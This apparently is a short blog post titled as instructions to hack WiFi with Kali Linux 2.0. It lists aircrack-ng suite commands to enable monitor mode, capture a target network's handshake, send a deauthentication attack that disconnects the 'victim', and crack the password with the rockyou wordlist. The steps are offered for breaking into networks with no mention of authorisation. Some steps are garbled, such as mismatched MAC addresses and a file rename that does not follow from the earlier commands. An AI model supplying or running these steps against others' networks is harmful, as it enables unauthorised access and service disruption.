Instructions to hack wifi utilizing kali linux 2.0



Open terminal in kali linux.

2.  Type command : airmon-ng

           (Check weather your wireless card is avilable and working properly)

3.  Type command : airmon-ng start wlan0

           (Command put your wireless card into monitoring mode as wifi cracking is possible in monitoring mode only)

4.  Type command: airodump-ng mon0

            (command to scan the wireless access point around you and get details about available wifi network.)

5.  Type command : airodump-ng –w <File name> –c <Target Channel no.> --bssid <BSSID of target > mon0

               (eg: airodump-ng –w MTNL –c 3 –bssid 11:22:33:44:55:66 mon0)

              (The Above command is used to capture the handshake)

6.  Type command: sudo aireplay-ng -0 0 –a 11:22:33:44:55:66 mon0

              (Send deauth attack on victim wifi access point this will disconnect the victim from the wifi)

7.  Type command: aircrack-ng -w wordlist.lst -b 00:11:22:33:44:55 MTNL.cap

            [ -w=The name of the dictionary file
             -b=The MAC address of the access point
              MTNL.cap=The name of the file that contains the authentication handshake ]

Above command will Crack the wifi using dictionery attack

[Note: Default directory for wordlist in linux:  /usr/share/wordlists/rockyou.txt.gz]

Steps to attach dictionery


1. cp /usr/share/wordlists/rockyou.txt.gz  

          (copy the file to root directory)

2. gunzIP rockyou.txt.gz    

          (UnzIP the file)

3. mv newrockyou.txt wordlist.lst    

           (rename the file from newrockyou to wordlist)
Previous
Next Post »